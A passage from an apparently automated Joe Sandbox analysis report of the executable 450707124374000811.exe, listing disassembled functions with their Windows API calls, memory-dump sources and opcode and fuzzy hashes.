                                                                • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                              • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,?,?,75923420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405CB4
                                                              • GetFileAttributesW.KERNELBASE(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,75923420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 00405CC4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID:
                                                              • API String ID: 3248276644-0
                                                              • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                              • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                              • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                              • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                              • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                              • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                              • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                              Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteValue
                                                              • String ID:
                                                              • API String ID: 2831762973-0
                                                              • Opcode ID: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                              • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                              • Opcode Fuzzy Hash: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                              • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                              Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Window$EnableShow
                                                              • String ID:
                                                              • API String ID: 1136574915-0
                                                              • Opcode ID: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                              • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                              • Opcode Fuzzy Hash: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                              • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                              Function 0040665C Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                                • Part of subcall function 004065EC: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                              • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                              • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                              • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                              Function 00405D74 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                              • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                              • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                              • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                              Function 00405832 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                              • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                              • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                              • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                              Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                                • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FilePointerwsprintf
                                                              • String ID:
                                                              • API String ID: 327478801-0
                                                              • Opcode ID: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                              • Instruction ID: 338d2460217d73ea2e2bb91e7847e27d4a9cf2f97daf1e2edf82c438741940a9
                                                              • Opcode Fuzzy Hash: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                              • Instruction Fuzzy Hash: 83E09271B00104AFDB11EBA5AE498AE7779DB80314B24403BF101F50D2CA794E119E2D
                                                              Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite
                                                              • String ID:
                                                              • API String ID: 390214022-0
                                                              • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                              • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                              • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                              • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                              Function 0040611D Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                              • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                              • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                              Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                              • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                              • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                              Function 00405DF7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                              • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                              • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                              Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                              • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                              • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                              • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                              Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID:
                                                              • API String ID: 1096422788-0
                                                              • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                              • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                              • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                              • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                              Function 004060EF Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,0040617D,0042C228,00000000,?,?,Call,?), ref: 00406113
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
